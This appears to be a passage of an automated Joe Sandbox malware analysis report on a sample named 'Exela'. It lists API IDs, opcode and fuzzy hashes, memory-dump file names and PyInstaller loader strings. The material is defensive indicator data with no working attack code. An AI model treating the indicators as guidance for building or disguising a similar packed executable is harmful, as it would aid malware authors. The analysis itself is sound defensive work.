                                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                                                                                                                                                                                                                            • Instruction ID: 1fbace0b4ee27007389d68bf9bba8e665a50f9c9a7810176078ed253deefea20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C218E72B047419AEB248F68C4863EC3BB0EB04758F444635E71CA6BC9DF39D584CB45
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                            • Instruction ID: 5576c075f0df4d728959a9795c283128dad3628c92348dce194f782996a47ec6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC119923F1C68141EA609F59D4823B9AB60BF85B84F154435EB4CA77DACF3ED480874A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                                                                                                                                                                                                                            • Instruction ID: 7631d49ef99bafc8b62ee3236d08a8c82b2056041924b9f79788bc7cded04a43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF21C533B18A8186DB658F1CE4863797BA0FB84B54F144234EA5D976D9DF3FD4808B05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                                                                                                                                                                                                                            • Instruction ID: 4939a62821196a80c627daeed502d113049477690e9e9976406e35b9bf2dd2d3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F010C22B0474140EA00DF5A9482269AFA4FF81FE4F084270DE6CA3BDECE3DD1818305
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6E3A7BF86,?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2), ref: 00007FF6E3A7F78D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                                                                                                                                                                                                                            • Instruction ID: 8d970d0d091887f62acfb64508169c201c052282a9c070875e729d7d4630bd70
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F06D1AB1A20745FE54976E59973F55B905F86B80F0C4430C90EEA3C9EE2EE6C1822A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6E3A71304,?,?,?,00007FF6E3A72816,?,?,?,?,?,00007FF6E3A73E09), ref: 00007FF6E3A7E1DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                                                                                                                                                                                                                            • Instruction ID: 01025d6c5a09d138c14ef5e750c1a2b6f4040460c2f117778f3bb1e2cadbef45
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF08227F0924744FE5467699987B759A804FD47A0F084330FC2EE52C9DE2EE4C0821B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalDeleteSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 166494926-0
                                                                                                                                                                                                                                                            • Opcode ID: 6cef81dd87d65aa7e3425930808111007e468ca4050348ada3bd0df8db49a6fd
                                                                                                                                                                                                                                                            • Instruction ID: ba6c4c50f80777901d064cbc55c5d8d60092c82cde99ebe42ff41fc3d1196270
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cef81dd87d65aa7e3425930808111007e468ca4050348ada3bd0df8db49a6fd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF03057F0890641FB10ABADD8C33741AA0EF99B05F002531C85EE62A6CE1EA0C4870F
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                                                                                            • Opcode ID: 7e1da00ca9488ba9f8c26a1434a4c92b0e41dc958698a2dc8e9c758257d60df6
                                                                                                                                                                                                                                                            • Instruction ID: e615708a5ede46df3e7bbb21bbaf7dcc25813e05c33202498c75a5e98843888f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e1da00ca9488ba9f8c26a1434a4c92b0e41dc958698a2dc8e9c758257d60df6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541C517E2C68182E6119B2C95163FC3768FBA5744F449232DB8DA2193EF29E2D8C305
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                                            • Opcode ID: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                                                                                                                                                                                                                            • Instruction ID: 79ba96b6aef64dac3ef9ea26b69491582351da6647f921c4cbb990c165b42023
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F317C73718A8186EB609F68E8853E97760FB84704F00403ADA4E97B94DF39D288CB09
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                                            • Opcode ID: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                                                                                                                                                                                                                            • Instruction ID: 2b9731e7c9d8c6b4ef88cd7653f06bdfd4a876b103392bad866ba014183d7fdb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF318F37718B8186DB608F29E8853AE77A4FB88754F400135EA8D93BA8DF3DC195CB05
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                                            • Opcode ID: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                                                                                                                                                                                                                            • Instruction ID: 4bff5a3935f10e202b537300fc6af518e2483255ce657ffd61b4d17251d7c7f0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66B1D623B186C241EE64DB2AD41A3B96B62EB44BD4F444131EE5DA7BC9DF3DE481C309
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                            • API String ID: 190572456-4266016200
                                                                                                                                                                                                                                                            • Opcode ID: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                                                                                                                                                                                                                            • Instruction ID: cfaa460c3a9c2e1e21572d5660f7e230a3dfbe4ac4f1b9cd73e55373e033928d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0412EA77B1AB4390EA189B1CB85A3703BF1AF04755B841131C81EA6664FF7EE5D8D20E
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
